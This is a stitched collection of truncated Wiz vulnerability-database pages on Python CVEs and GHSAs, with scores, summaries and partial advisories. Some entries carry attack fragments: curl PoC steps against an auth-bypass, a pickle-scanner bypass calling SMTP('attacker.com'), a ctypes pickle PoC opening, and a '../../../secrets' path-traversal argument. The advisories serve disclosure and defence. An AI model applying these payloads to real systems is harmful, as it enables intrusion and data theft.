CVE-2026-35002 [CRITICAL] CVE-2026-35002 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35002 :
Python vulnerability analysis and mitigation
Agno versions prior to 2.3.24 contain an arbitrary code execution vulnerability in the model execution component that allows attackers to execute arbitrary Python code by manipulating the field_type parameter passed to eval(). Attackers can influence the field_type value in a FunctionCall to achieve remote code execution.
Source : NVD
## 9.3
Score
Published April 2, 2026
Severity CRITICAL
CNA Score 9.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 63.4
Exploitation Probability (EPSS) 0.4
Affected packages and libraries
agno
Sources
NVD
pip Severity CRITICAL Has Fix Added at: Apr 05, 20
Wiz
CVE-2026-22041 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.0
CVE-2026-22041 [LOW] CVE-2026-22041 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22041 :
Python vulnerability analysis and mitigation
Logging Redactor is a Python library designed to redact sensitive data in logs based on regex patterns and / or dictionary keys. Prior to version 0.0.6, non-string types are converted into string types, leading to type errors in %d conversions. The problem has been patched in version 0.0.6. No known workarounds are available.
Source : NVD
## 2
Score
Published January 8, 2026
Severity LOW
CNA Score 2.0
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
loggingredactor
Sources
NVD
pip Severity LOW Has Fix Added at: Jan
Wiz
CVE-2026-34730 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-34730 [MEDIUM] CVE-2026-34730 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34730 :
Python vulnerability analysis and mitigation
Copier is a library and CLI app for rendering project templates. Prior to version 9.14.1, Copier's _external_data feature allows a template to load YAML files using template-controlled paths. If untrusted templates are in scope, a malicious template can read attacker-chosen YAML-parseable local files that are accessible to the user running Copier and expose their contents in rendered output. This issue has been patched in version 9.14.1.
Source : NVD
## 5.5
Score
Published April 2, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1
Exploitation Probab
Wiz
CVE-2026-35490 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-35490 [CRITICAL] CVE-2026-35490 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35490 :
Python vulnerability analysis and mitigation
## Summary
@login_optionally_required
@blueprint.route()
@route()
@route()
## Details
Correct order (used on 30+ routes):
@blueprint.route('/settings', methods=['GET'])
@login_optionally_required
def settings():
...
Incorrect order (13 vulnerable routes):
@login_optionally_required # ← Applied to return value of @route, NOT the view
@blueprint.route('/backups/download/') # ← Registers raw function
def download_backup(filename):
...
## POC
=== PHASE 1: Confirm Authentication is Required ===
$ curl -s -o /dev/null -w "%{http_code}" http://127.0.0.1:5557/
Main page: HTTP 302 -> http://127.0.0.1:5557/login?next=/
$ curl -s -o /dev/null -w "%{http_code}" http://127.0.0.1:5557/settings
Settings page: HTTP 302 (aut
Wiz
GHSA-mhc9-48gj-9gp3 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-mhc9-48gj-9gp3 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-mhc9-48gj-9gp3 :
Python vulnerability analysis and mitigation
## Assessment
REDUCE
BUILD
## Original report
## Summary
is_likely_safe()
check_safety()
--check-safety
always_check_safety()
check_safety()
LIKELY_SAFE
socketserver.TCPServer
signal.signal
smtplib.SMTP
sqlite3.connect
## Details
The bypass exploits three weaknesses in fickling's static analysis pipeline:
likely_safe_imports
fickle.py:432-435
from smtplib import SMTP
"SMTP"
likely_safe_imports
smtplib
OvertlyBadEvals
analysis.py:301-310
likely_safe_imports
SMTP('attacker.com')
__setstate__
fickle.py:443-446
__setstate__
non_setstate_calls
OvertlyBadEvals
UnusedVariables
## Affected versions
All versions through 0.1.7 (latest as of 2026-02-18).
## Affected APIs
fickling.is_l
Wiz
CVE-2026-28490 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.3
CVE-2026-28490 [HIGH] CVE-2026-28490 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28490 :
Python vulnerability analysis and mitigation
Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a cryptographic padding oracle vulnerability was identified in the Authlib Python library concerning the implementation of the JSON Web Encryption (JWE) RSA1_5 key management algorithm. Authlib registers RSA1_5 in its default algorithm registry without requiring explicit opt-in, and actively destroys the constant-time Bleichenbacher mitigation that the underlying cryptography library implements correctly. This issue has been patched in version 1.6.9.
Source : NVD
## 8.3
Score
Published March 16, 2026
Severity HIGH
CNA Score 8.3
Affected Technologies
Python
MinimOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CI
Wiz
CVE-2026-25198 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-25198 [MEDIUM] CVE-2026-25198 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25198 :
Python vulnerability analysis and mitigation
web2py versions 2.27.1-stable+timestamp.2023.11.16.08.03.57 and prior contain an open redirect vulnerability. If this vulnerability is exploited, the user may be redirected to an arbitrary website when accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack.
Source : NVD
## 5.1
Score
Published February 5, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
web2py
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Feb 08, 2026
## Get a CVE risk
Wiz
CVE-2026-32640 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-32640 [HIGH] CVE-2026-32640 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32640 :
Python vulnerability analysis and mitigation
SimpleEval is a library for adding evaluatable expressions into python projects. Prior to 1.0.5, objects (including modules) can leak dangerous modules through to direct access inside the sandbox. If the objects you've passed in as names to SimpleEval have modules or other disallowed / dangerous objects available as attrs. Additionally, dangerous functions or modules could be accessed by passing them as callbacks to other safe functions to call. The latest version 1.0.5 has this issue fixed. This vulnerability is fixed in 1.0.5.
Source : NVD
## 8.7
Score
Published March 16, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release
Wiz
La base de données CVE : des informations sur les vulnérabilités sélectionnées par Wiz | Wiz
blogs_wiz·CVSS 9.8
[CRITICAL] La base de données CVE : des informations sur les vulnérabilités sélectionnées par Wiz | Wiz
## Base de données de vulnérabilités Wiz
Une ressource complète pour la surveillance des vulnérabilités de premier plan dans les environnements cloud, conçue pour les équipes de sécurité et les professionnels du cloud
Voyez comment Wiz détecte les vulnérabilités exploitables à travers des charges de travail cloud. Regardez la démo de 12 minutes
## Explorer par technologie
## Filtres populaires
## Profil élevé
Identifiant CVE
Sévérité
Score
Technologies
Nom du composant
Exploit CISA KEV
A corrigé
Date de publication
CVE-2026-35616
CRITICAL
9.8
FortiClient EMS
cpe:2.3:a:fortinet:forticlient_enterprise_management_server
Oui
Oui
Apr 04, 2026
GHSA-69fq-xp46-6x23
CRITICAL
9.4
N/A
github.com/aquasecurity/trivy
Non
Oui
Mar 24, 2026
CVE-2026-3055
CRITICAL
9.3
C
Wiz
CVE-2026-33046 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.7
CVE-2026-33046 [HIGH] CVE-2026-33046 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33046 :
Python vulnerability analysis and mitigation
XELATEX_PATH
indico.conf
podman
XELATEX_PATH
indico.conf
None
indico-uwsgi
indico-celery
Source : NVD
## 7.7
Score
Published March 23, 2026
Severity HIGH
CNA Score 7.7
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
indico
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component
Wiz
CVE-2025-68145 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.4
CVE-2025-68145 [MEDIUM] CVE-2025-68145 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68145 :
Python vulnerability analysis and mitigation
In mcp-server-git versions prior to 2025.12.17, when the server is started with the --repository flag to restrict operations to a specific repository path, it did not validate that repo_path arguments in subsequent tool calls were actually within that configured path. This could allow tool calls to operate on other repositories accessible to the server process. The fix adds path validation that resolves both the configured repository and the requested path (following symlinks) and verifies the requested path is within the allowed repository before executing any git operations. Users are advised to upgrade to 2025.12.17 upon release to remediate this issue.
Source : NVD
## 6.4
Score
Published December 17, 2025
Severit
Wiz
GHSA-mxhj-88fx-4pcv Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-mxhj-88fx-4pcv Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-mxhj-88fx-4pcv :
Python vulnerability analysis and mitigation
## Assessment
OBJ
NEWOBJ
NEWOBJ_EX
## Original report
## Summary
is_likely_safe()
check_safety()
--check-safety
always_check_safety()
check_safety()
LIKELY_SAFE
new_variable()
## Details
new_variable()
Obj.run()
fickle.py:1333-1350
fickle.py:1286-1301
# Line 1300: call IS saved to module_body
var_name = interpreter.new_variable(call)
interpreter.stack.append(ast.Name(var_name, ast.Load()))
fickle.py:1333-1350
# Line 1348: call is ONLY on the stack, NOT in module_body
interpreter.stack.append(ast.Call(kls, args, []))
ast.Call
from smtplib import SMTP # import present (from STACK_GLOBAL)
result = None # no call to SMTP visible
SMTP('127.0.0.1')
fickle.py:1411-1420
fickle.py:1423-1433
cls._
Wiz
CVE-2026-34954 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-34954 [HIGH] CVE-2026-34954 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34954 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to version 1.5.95, FileTools.download_file() in praisonaiagents validates the destination path but performs no validation on the url parameter, passing it directly to httpx.stream() with follow_redirects=True. An attacker who controls the URL can reach any host accessible from the server including cloud metadata services and internal network services. This issue has been patched in version 1.5.95.
Source : NVD
## 8.6
Score
Published April 3, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9
Exploitation Probabilit
Wiz
CVE-2026-21531 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-21531 [CRITICAL] CVE-2026-21531 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21531 :
Python vulnerability analysis and mitigation
Deserialization of untrusted data in Azure SDK allows an unauthorized attacker to execute code over a network.
Source : NVD
## 9.8
Score
Published February 10, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 64
Exploitation Probability (EPSS) 0.5
Affected packages and libraries
azure-ai-language-conversations-authoring
Sources
NVD
pip Severity CRITICAL Has Fix Added at: Feb 15, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabi
Wiz
CVE-2026-1707 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.4
CVE-2026-1707 [HIGH] CVE-2026-1707 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1707 :
Python vulnerability analysis and mitigation
\restrict
\unrestrict
Source : NVD
## 6.3
Score
Published February 5, 2026
Severity MEDIUM
CNA Score 7.4
Affected Technologies
Python
pgAdmin
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:pgadmin:pgadmin:*:*:*:*:*:postgresql:*:*
pgadmin4-doc
Sources
NVD
pip Severity HIGH Has Fix Added at: Feb 08, 2026
Windows Severity MEDIUM Has Fix Added at: Feb 08, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
Wiz
CVE-2026-1117 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-1117 [HIGH] CVE-2026-1117 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1117 :
Python vulnerability analysis and mitigation
lollms_generation_events.py
add_events
generate_text
cancel_generation
generate_msg
generate_msg_from
lollmsElfServer.busy
lollmsElfServer.cancel_gen
Source : NVD
## 8.2
Score
Published February 2, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
lollms
Sources
NVD
pip Severity HIGH Has Fix Added at: Feb 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulner
Wiz
CVE-2026-22584 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-22584 [CRITICAL] CVE-2026-22584 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22584 :
Python vulnerability analysis and mitigation
Improper Control of Generation of Code ('Code Injection') vulnerability in Salesforce Uni2TS on MacOS, Windows, Linux allows Leverage Executable Code in Non-Executable Files.This issue affects Uni2TS: through 1.2.0.
Source : NVD
## 9.8
Score
Published January 9, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
uni2ts
Sources
NVD
pip Severity CRITICAL Has Fix Added at: Jan 22, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on wha
Wiz
CVE-2026-27199 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2026-27199 [MEDIUM] CVE-2026-27199 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27199 :
Python vulnerability analysis and mitigation
Werkzeug is a comprehensive WSGI web application library. Versions 3.1.5 and below, the safe_join function allows Windows device names as filenames if preceded by other path segments. This was previously reported as GHSA-hgf8-39gv-g3f2, but the added filtering failed to account for the fact that safe_join accepts paths with multiple segments, such as example/NUL. The function send_from_directory uses safe_join to safely serve files at user-specified paths under a directory. If the application is running on Windows, and the requested path ends with a special device name, the file will be opened successfully, but reading will hang indefinitely. This issue has been fixed in version 3.1.6.
Source : NVD
## 6.3
Score
Publis
Wiz
CVE-2026-27696 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-27696 [HIGH] CVE-2026-27696 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27696 :
Python vulnerability analysis and mitigation
is_safe_valid_url()
Source : NVD
## 8.6
Score
Published February 25, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
changedetection.io
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-356
Wiz
CVE-2026-29065 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-29065 [HIGH] CVE-2026-29065 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29065 :
Python vulnerability analysis and mitigation
changedetection.io is a free open source web page change detection tool. Prior to version 0.54.4, a Zip Slip vulnerability in the backup restore functionality allows arbitrary file overwrite via path traversal in uploaded ZIP archives. This issue has been patched in version 0.54.4.
Source : NVD
## 8.8
Score
Published March 6, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
changedetection.io
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 05, 2026
## Get a CVE risk assessment
Wiz
CVE-2026-34052 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.9
CVE-2026-34052 [MEDIUM] CVE-2026-34052 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34052 :
Python vulnerability analysis and mitigation
LTI JupyterHub Authenticator is a JupyterHub authenticator for LTI. Prior to version 1.6.3, the LTI 1.1 validator stores OAuth nonces in a class-level dictionary that grows without bounds. Nonces are added before signature validation, so an attacker with knowledge of a valid consumer key can send repeated requests with unique nonces to gradually exhaust server memory, causing a denial of service. This issue has been patched in version 1.6.3.
Source : NVD
## 5.9
Score
Published April 3, 2026
Severity MEDIUM
CNA Score 5.9
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12
Exploitation Pr
Wiz
CVE-2025-67502 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2025-67502 [MEDIUM] CVE-2025-67502 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67502 :
Python vulnerability analysis and mitigation
Taguette is an open source qualitative research tool. In versions 1.5.1 and below, attackers can craft malicious URLs that redirect users to arbitrary external websites after authentication. The application accepts a user-controlled next parameter and uses it directly in HTTP redirects without any validation. This can be exploited for phishing attacks where victims believe they are interacting with a trusted Taguette instance but are redirected to a malicious site designed to steal credentials or deliver malware. This issue is fixed in version 1.5.2.
Source : NVD
## 6.1
Score
Published December 10, 2025
Severity MEDIUM
CNA Score 5.4
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CIS
Wiz
CVE-2026-32716 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-32716 [HIGH] CVE-2026-32716 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32716 :
Python vulnerability analysis and mitigation
SciTokens is a reference library for generating and using SciTokens. Prior to version 1.9.6, the Enforcer incorrectly validates scope paths by using a simple prefix match (startswith). This allows a token with access to a specific path (e.g., /john) to also access sibling paths that start with the same prefix (e.g., /johnathan, /johnny), which is an Authorization Bypass. This issue has been patched in version 1.9.6.
Source : NVD
## 6.5
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 8.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9
Exploitation Probability (EPSS) N/A
Affected p
Wiz
GHSA-425g-fjhq-5h92 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-425g-fjhq-5h92 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-425g-fjhq-5h92 :
Python vulnerability analysis and mitigation
## Summary
openssl_encrypt/modules/json_validator.py
jsonschema
## Affected Code
if not JSONSCHEMA_AVAILABLE:
print(f"Warning: Cannot validate against schema '{schema_name}' - jsonschema library not available")
return
additionalProperties: true
## Impact
An attacker who can influence the Python environment (remove the jsonschema package) or craft metadata with an unknown version number can bypass all schema checks. Malformed or malicious metadata will be accepted without validation.
## Recommended Fix
jsonschema
Or fail-closed: refuse to process metadata when validation cannot be performed
Reject unknown format versions instead of silently skipping validation
additionalProperties: false
## Fix
6e
Wiz
GHSA-4675-36f9-wf6r Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-4675-36f9-wf6r Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-4675-36f9-wf6r :
Python vulnerability analysis and mitigation
## Summary
Picklescan doesnt flag ctypes module as a dangerous module, which is a huge issue. ctypes is basically a foreign function interface library and can be used to
Load DLLs
Call C functions directly
Manipulate memory raw pointers.This can allow attackers to achieve RCE by invoking direct syscalls without going through blocked modules. Another major issue that ctypes being allowed presents is that it can be used down the line to dismantle interpreter based python sandboxes as ctypes allow direct access to raw memory.This is a more severe loophole than normal gadget chains and bypasses as raw memory access can be used for a lot of nefarious purposes down the line if left undetected
## PoC
import pickle
im
Wiz
CVE-2026-32116 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-32116 [HIGH] CVE-2026-32116 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32116 :
Python vulnerability analysis and mitigation
Magic Wormhole makes it possible to get arbitrary-sized files and directories from one computer to another. From 0.21.0 to before 0.23.0, receiving a file (wormhole receive) from a malicious party could result in overwriting critical local files, including ~/.ssh/authorized_keys and .bashrc. This could be used to compromise the receiver's computer. Only the sender of the file (the party who runs wormhole send) can mount the attack. Other parties (including the transit/relay servers) are excluded by the wormhole protocol. This vulnerability is fixed in 0.23.0.
Source : NVD
## 8.2
Score
Published March 12, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
Wiz
CVE-2026-22606 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9
CVE-2026-22606 [HIGH] CVE-2026-22606 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22606 :
Python vulnerability analysis and mitigation
Fickling is a Python pickling decompiler and static analyzer. Fickling versions up to and including 0.1.6 do not treat Python’s runpy module as unsafe. Because of this, a malicious pickle that uses runpy.run_path() or runpy.run_module() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS. If a user relies on Fickling’s output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system. This affects any workflow or product that uses Fickling as a security gate for pickle deserialization. This issue has been patched in version 0.1.7.
Source : NVD
## 8.9
Score
Published January 10, 2026
Severity HIGH
CNA Score 8.9
Affected Technologie
Wiz
CVE-2026-35043 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-35043 [HIGH] CVE-2026-35043 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35043 :
Python vulnerability analysis and mitigation
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.38, the cloud deployment path in src/bentoml/_internal/cloud/deployment.py was not included in the fix for CVE-2026-33744. Line 1648 interpolates system_packages directly into a shell command using an f-string without any quoting. The generated script is uploaded to BentoCloud as setup.sh and executed on the cloud build infrastructure during deployment, making this a remote code execution on the CI/CD tier. This vulnerability is fixed in 1.4.38.
Source : NVD
## 7.8
Score
Published April 6, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit N
Wiz
GHSA-vfgx-5q85-58q3 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-vfgx-5q85-58q3 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-vfgx-5q85-58q3 :
Python vulnerability analysis and mitigation
## Summary
generate_pseudorandom_sequence()
openssl_encrypt/plugins/steganography/core/utils.py
random
## Affected Code
random.seed(seed)
sequence = random.sample(range(max_value), min(length, max_value))
return sequence
SecureBytes
## Impact
The Mersenne Twister's state can be recovered from approximately 624 outputs. An attacker who knows or guesses the password can predict the PRNG sequence and determine exactly which pixels contain hidden data, potentially extracting the hidden data without the password.
## Recommended Fix
secrets
Use full 32-byte SHA-256 output as seed material
SecureBytes
## Fix
09e96e0
releases/1.4.x
Source : NVD
## 6.6
Score
Published March 31, 2026
Severity MEDIU
Wiz
CVE-2026-1669 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-1669 [HIGH] CVE-2026-1669 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1669 :
Python vulnerability analysis and mitigation
Arbitrary file read in the model loading mechanism (HDF5 integration) in Keras versions 3.0.0 through 3.13.1 on all supported platforms allows a remote attacker to read local files and disclose sensitive information via a crafted .keras model file utilizing HDF5 external dataset references.
Source : NVD
## 7.1
Score
Published February 11, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
tensorflow-cpu-jupyter
keras
Sources
NVD
Chainguard Has Fix Added at: Feb 20, 2026
Debian 11
Wiz
CVE-2026-21445 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-21445 [HIGH] CVE-2026-21445 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21445 :
Python vulnerability analysis and mitigation
Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0.dev45, multiple critical API endpoints in Langflow are missing authentication controls. The issue allows any unauthenticated user to access sensitive user conversation data, transaction histories, and perform destructive operations including message deletion. This affects endpoints handling personal data and system operations that should require proper authorization. Version 1.7.0.dev45 contains a patch.
Source : NVD
## 8.8
Score
Published January 2, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date
Wiz
CVE-2026-21874 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-21874 [MEDIUM] CVE-2026-21874 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21874 :
Python vulnerability analysis and mitigation
NiceGUI is a Python-based UI framework. From versions v2.10.0 to 3.4.1, an unauthenticated attacker can exhaust Redis connections by repeatedly opening and closing browser tabs on any NiceGUI application using Redis-backed storage. Connections are never released, leading to service degradation when Redis hits its connection limit. NiceGUI continues accepting new connections - errors are logged but the app stays up with broken storage functionality. This issue has been patched in version 3.5.0.
Source : NVD
## 5.3
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation
Wiz
CVE-2026-35167 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-35167 [HIGH] CVE-2026-35167 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35167 :
Python vulnerability analysis and mitigation
Kedro is a toolbox for production-ready data science. Prior to 1.3.0, the _get_versioned_path() method in kedro/io/core.py constructs filesystem paths by directly interpolating user-supplied version strings without sanitization. Because version strings are used as path components, traversal sequences such as ../ are preserved and can escape the intended versioned dataset directory.
This is reachable through multiple entry points: catalog.load(..., version=...), DataCatalog.from_config(..., load_versions=...), and the CLI via kedro run --load-versions=dataset:../../../secrets. An attacker who can influence the version string can force Kedro to load files from outside the intended version directory, enabling unauthorized file
Wiz
CVE-2026-34445 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-34445 [HIGH] CVE-2026-34445 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34445 :
Python vulnerability analysis and mitigation
Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, the ExternalDataInfo class in ONNX was using Python’s setattr() function to load metadata (like file paths or data lengths) directly from an ONNX model file. It didn’t check if the "keys" in the file were valid. Due to this, an attacker could craft a malicious model that overwrites internal object properties. This issue has been patched in version 1.21.0.
Source : NVD
## 8.6
Score
Published April 1, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percent
Wiz
CVE-2026-34070 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-34070 [HIGH] CVE-2026-34070 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34070 :
Python vulnerability analysis and mitigation
